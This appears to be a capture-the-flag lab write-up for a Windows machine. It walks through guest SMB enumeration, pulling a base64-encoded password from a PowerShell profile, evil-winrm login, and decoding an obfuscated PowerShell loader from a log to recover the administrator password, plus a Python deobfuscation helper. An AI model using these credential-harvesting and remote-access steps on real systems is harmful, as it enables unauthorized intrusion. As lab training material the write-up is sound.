Compromised

Enumeration

$ smbmap -u Guest -H 192.168.192.152
        Scripts$                                                READ ONLY
        Users$                                                  READ ONLY
        
$ smbclient \\\\192.168.192.152\\Scripts$ -U Guest
$ smbclient \\\\192.168.192.152\\Users$ -U Guest

Users: administrator, scripting

smb: \scripting\Documents\WindowsPowerShell\> get profile.ps1

This file contains a base64-encoded password.

$password = ConvertTo-SecureString "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('[REDACTEDBASE64ENCODED]')))" -AsPlainText -Force

Initial Access

$ evil-winrm -u scripting -p [REDACTED] -i 192.168.192.152

PrivEsc

There is a log file containing a base64-encoded string.

HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc JABPAHcAbgBlAGQAIAA9ACAAQAAoACkAOwAkAE8AdwBuAGUAZAAgACsAPQAgAHsAJABEAGUAYwBvAGQAZQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2A...

We need to decode this long part (the `-Enc` argument is base64 of the script as UTF-16LE text).

The decoded script is obfuscated, so we have to untangle it.

After stripping the unnecessary parts, the script boils down to:

# Base64-decode the embedded blob into a byte array
$Decoded = [System.Convert]::FromBase64String("[REDACTEDBASE64ENCODED]")
# Wrap the bytes in a MemoryStream so GZipStream can read them
$ms = (New-Object System.IO.MemoryStream($Decoded,0,$Decoded.Length))
# Decompress the GZip stream and read the resulting script text
(New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).readtoend()

Running these commands in order prints the password.
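As an added example (not part of the original write-up), a small Python helper that peels the two layers seen in the log line above: the `-Enc` argument (base64 of UTF-16LE text) and the inner base64 blob that the loader runs through GZipStream. It builds its own harmless sample instead of using the redacted payload from the page; the `INNER` script and the `build_sample` wrapper are constructed here.

```python
import base64
import gzip
import re
from typing import Optional

def decode_enc_argument(enc_b64: str) -> str:
    """Decode the argument of powershell.exe -Enc: base64 of the UTF-16LE script text."""
    return base64.b64decode(enc_b64).decode("utf-16-le")

# The loader on the page embeds its payload as FromBase64String("...") and gunzips it.
B64_RE = re.compile(r"FromBase64String\(['\"]([A-Za-z0-9+/=]+)['\"]\)")

def unwrap_gzip_payload(script: str) -> Optional[str]:
    """Pull the base64 blob out of the decoded loader and decompress it if it is GZip."""
    m = B64_RE.search(script)
    if not m:
        return None
    raw = base64.b64decode(m.group(1))
    if raw[:2] != b"\x1f\x8b":          # GZip magic; plain bytes are returned as text instead
        return raw.decode("utf-8", "replace")
    return gzip.decompress(raw).decode("utf-8")

def deobfuscate(enc_b64: str) -> str:
    """Peel both layers; fall back to the decoded loader if no inner blob is found."""
    loader = decode_enc_argument(enc_b64)
    inner = unwrap_gzip_payload(loader)
    return loader if inner is None else inner

# Constructed, harmless sample wrapped the same way as the page's log line.
INNER = 'Write-Output "hello from the inner script"'

def build_sample(inner: str = INNER) -> str:
    """Gzip + base64 the inner script, embed it in a loader, then -Enc encode the loader."""
    blob = base64.b64encode(gzip.compress(inner.encode("utf-8"))).decode("ascii")
    loader = (
        f'$Decoded = [System.Convert]::FromBase64String("{blob}")\n'
        "$ms = (New-Object System.IO.MemoryStream($Decoded,0,$Decoded.Length))\n"
        "(New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream("
        "$ms, [System.IO.Compression.CompressionMode]::Decompress))).readtoend()"
    )
    return base64.b64encode(loader.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    print(deobfuscate(build_sample()))
```

On a real log line, pass the text after `-Enc` to `deobfuscate`; if the loader does not match the `FromBase64String` pattern, you get the decoded loader back to inspect by hand.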

$ evil-winrm -u Administrator -p [REDACTED] -i 192.168.192.152
